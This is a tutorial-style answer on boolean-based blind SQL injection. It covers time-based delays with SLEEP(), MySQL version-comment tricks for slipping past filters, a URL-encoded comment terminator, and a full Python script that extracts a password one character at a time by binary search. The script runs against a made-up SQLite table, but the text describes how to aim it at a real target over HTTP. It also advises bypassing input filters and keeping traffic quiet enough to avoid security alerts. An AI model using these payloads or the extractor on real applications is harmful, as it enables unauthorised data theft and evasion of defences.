TL;DR
Yes. Boolean-based blind SQL injection often runs into trouble with line-break characters (such as newlines) and with anything more complex than a single true/false comparison. That follows from how the technique works: every request yields exactly one bit, learned from whether the server behaved as it does for "true" or for "false". There are ways around these limits using alternative techniques.
Understanding the Problem
Blind SQL injection does not return query results in the response the way an error-based or UNION-based injection does. Instead, you infer information from how the server reacts to different inputs. Boolean-based injection specifically asks questions that evaluate to true or false, and observes the difference in the response: a changed page body or a different HTTP status code.
Break characters and complex comparisons can interfere with this process because:
- Break characters: the application may strip or replace newlines before the query is executed, and a newline that does survive can split the payload so that the rest of it is parsed as a separate, invalid fragment and causes a syntax error. Keep each payload on a single line and terminate it with a comment sequence (--, #, /* */) rather than a line break.
- Comparisons: a simple equality or inequality check maps cleanly onto one true/false answer. Richer logic (greater than, less than, BETWEEN) still has to be collapsed into a single yes/no question per request, and the operators involved are more often blocked by input filters.
Solutions & Workarounds
- Time-Based Blind SQL Injection: This is often the most reliable alternative when no boolean difference is visible in the response.
  - Instead of asking "is this true?", you ask "how long does this query take?" and let the condition decide whether the database pauses.
  - Use functions like SLEEP() (MySQL) or pg_sleep() (PostgreSQL):

    SELECT IF(1=1, SLEEP(5), 0); -- MySQL example: pauses for 5 seconds only when the condition is true

  - Pick a delay clearly longer than the server's normal response jitter, and repeat borderline measurements, or a slow network will give you false positives.
- Conditional Comments (for specific platforms):
  - The SQL feature that does this is MySQL's version-specific comment: the body of /*!50000 ... */ is executed only when the server version is at least 5.00.00, so the same payload behaves differently depending on the version, and filters that treat everything between /* and */ as a comment let it through. (HTML "conditional comments" from old Internet Explorer versions are an unrelated feature and do not affect the query.)
- Exploiting Error Messages:
- Sometimes, even if you can’t get a clear true/false response, carefully crafted queries might trigger different error messages depending on the condition.
- This is less predictable but can provide valuable information.
- Substrings and Character-by-Character Extraction:
  - To extract data, pull it out one character at a time using functions like SUBSTRING():

    SELECT SUBSTRING(database(), 1, 1); -- Extract the first character of the database name (MySQL)

  - Combine this with boolean logic to determine each character individually. Comparing the character's ASCII code with an ordering operator and binary-searching the value needs about seven requests per character, against one request per candidate when only equality is available.
- Alternative Comparison Operators:
  - Some databases support alternative comparison operators or functions that are less likely to be filtered. A CASE expression, for example, works on every major database and can replace a vendor-specific IF():

    SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END;
- Encoding and Obfuscation:
  - Try URL-encoding special characters or using different character sets to bypass input filters. This is not always effective, but worth a try.

    ' AND 1=1%23

  - Here %23 URL-decodes to #, which starts a MySQL line comment, so the remainder of the application's original query is discarded and the injected condition becomes the last thing the parser sees.
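The following is an added example, not code from the original answer. It ties the substring extraction, the ordering-versus-equality comparison point and the single-line payload advice together against a constructed target: an in-memory SQLite table standing in for the vulnerable application, with a lookup that concatenates input into SQL. The `ask()` oracle, the sample `users` row and the `s3cr3t!` password are assumptions made for the demonstration; against a real target `ask()` would issue an HTTP request and compare the response instead of calling the lookup directly. SQLite's `unicode(substr(...))` plays the role of MySQL's `ASCII(SUBSTRING(...))`.

```python
import sqlite3
from typing import Optional

# --- Constructed stand-in for the vulnerable application --------------------
# An in-memory SQLite database and a lookup that concatenates user input into
# SQL (the defect that makes blind injection possible). Sample row is made up.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
_conn.execute("INSERT INTO users VALUES ('admin', 's3cr3t!')")  # constructed data
_conn.commit()

_query_count = 0  # number of oracle questions asked so far


def vulnerable_lookup(username: str) -> bool:
    """Boolean oracle: True when a matching row exists (the app would render a
    'welcome' page), False otherwise. A SQL error also looks like False, which
    is all a boolean-blind attacker ever gets to see."""
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    try:
        return _conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def ask(condition: str) -> bool:
    """Ask one yes/no question. The payload stays on a single line (no break
    characters for the app to strip), closes the quote the app opened, and a
    trailing comment discards the rest of the original statement."""
    global _query_count
    _query_count += 1
    return vulnerable_lookup(f"admin' AND ({condition}) -- ")


def reset_query_count() -> None:
    global _query_count
    _query_count = 0


def query_count() -> int:
    return _query_count


def extract_char(expr: str, pos: int, lo: int = 32, hi: int = 126) -> Optional[str]:
    """Recover character `pos` (1-based) of SQL expression `expr` by binary-
    searching its code point with '>' comparisons: at most 7 questions plus
    one length check per character. Returns None once `pos` is past the end."""
    if not ask(f"length({expr}) >= {pos}"):
        return None
    code = f"unicode(substr({expr}, {pos}, 1))"  # SQLite's ASCII(SUBSTRING(...))
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"{code} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_char_equality_only(expr: str, pos: int) -> Optional[str]:
    """Fallback for when ordering operators are filtered: try every printable
    code point with '=' in turn. Up to 95 questions per character."""
    if not ask(f"length({expr}) >= {pos}"):
        return None
    for code in range(32, 127):
        if ask(f"unicode(substr({expr}, {pos}, 1)) = {code}"):
            return chr(code)
    return None


def extract_string(expr: str, max_len: int = 64, equality_only: bool = False) -> str:
    """Pull the value of `expr` out of the database one character at a time."""
    pick = extract_char_equality_only if equality_only else extract_char
    out = []
    for pos in range(1, max_len + 1):
        ch = pick(expr, pos)
        if ch is None:
            break
        out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    target = "(SELECT password FROM users WHERE username = 'admin')"
    reset_query_count()
    print(extract_string(target), "recovered in", query_count(), "requests (binary search)")
    reset_query_count()
    print(extract_string(target, equality_only=True), "recovered in", query_count(), "requests (equality only)")
```

Running it recovers the seven-character password in under 60 requests with binary search and in several hundred with equality checks alone, which is the practical reason to fight for an ordering operator (or a CASE expression wrapping one) before falling back to per-candidate equality tests.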
Important Considerations
- Database-Specific Syntax: SQL syntax varies between databases (MySQL, PostgreSQL, Oracle, etc.). Adapt your queries accordingly.
- Input Filtering: Web applications often have input filters to prevent SQL injection. Identify and bypass these filters if possible.
- Rate Limiting: Character-by-character extraction means hundreds or thousands of requests, and time-based extraction adds a deliberate delay to each one. Excessive requests can trigger rate limiting or security alerts, so be mindful of the server's capacity and of how noisy the traffic is.